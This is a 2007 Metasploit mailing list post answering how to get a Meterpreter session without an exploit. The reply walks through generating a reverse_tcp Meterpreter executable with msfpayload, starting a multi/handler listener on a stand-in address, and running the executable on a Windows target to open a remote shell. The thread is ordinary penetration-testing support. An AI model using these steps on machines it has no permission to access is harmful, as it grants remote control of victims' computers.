Metasploit mailing list archives

query about meterpreter


From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 4 May 2007 10:13:59 -0700

On Fri, May 04, 2007 at 06:05:01PM +0530, Ramakrishna Nyayapathi wrote:
Hi all,
Many congrats to the metasploit team for writing such a wonderful tool.
I was wondering if it would be possible to obtain access to a remote host
through meterpreter-say a windows box running netcat or telnet server
without using any exploit?

Yes, you can do this.  There are three steps involved:

1. Generate an executable for the reverse/bind stager

You can do this by running:

$ msfpayload windows/meterpreter/reverse_tcp OPTS X > met.exe

2. Run the multi/handler exploit

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.2.3.4
LHOST => 1.2.3.4
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...

3. Run met.exe on the Windows box

You should receive a connection and get the Meterpreter prompt just as
if you were using a normal exploit.



Current thread: